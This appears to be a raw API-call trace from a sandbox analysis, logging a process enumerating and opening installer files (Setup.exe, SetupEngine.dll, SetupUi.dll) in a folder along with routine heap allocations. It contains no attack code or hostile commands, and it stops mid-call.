GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148)) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.627] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.628] AreFileApisANSI () returned 1 [0068.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupEngine.dll", lpUsedDefaultChar=0x0) returned 38 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.628] AreFileApisANSI () returned 1 [0068.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0068.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cd40 [0068.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0068.629] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.629] GetFileType (hFile=0x428) returned 0x1 [0068.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0068.629] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.629] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.629] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.629] CloseHandle (hObject=0x428) returned 1 [0068.629] AreFileApisANSI () returned 1 [0068.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cd98 [0068.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6cd98, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0068.630] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.630] GetFileType (hFile=0x428) returned 0x1 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0068.630] CloseHandle (hObject=0x428) returned 1 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.631] AreFileApisANSI () returned 1 [0068.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cef8 [0068.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6cef8, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0068.631] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158)) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.631] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0068.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0068.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0068.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0068.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0068.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.632] AreFileApisANSI () returned 1 [0068.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupUi.dll", lpUsedDefaultChar=0x0) returned 34 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0068.632] AreFileApisANSI () returned 1 [0068.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69300 [0068.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0068.633] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.633] GetFileType (hFile=0x428) returned 0x1 [0068.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0068.633] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.633] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.633] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.633] CloseHandle (hObject=0x428) returned 1 [0068.634] AreFileApisANSI () returned 1 [0068.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0068.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0068.634] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.634] GetFileType (hFile=0x428) returned 0x1 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.634] CloseHandle (hObject=0x428) returned 1 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.635] AreFileApisANSI () returned 1 [0068.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x690d0 [0068.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.dll") returned 34 [0068.635] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150)) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.635] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, 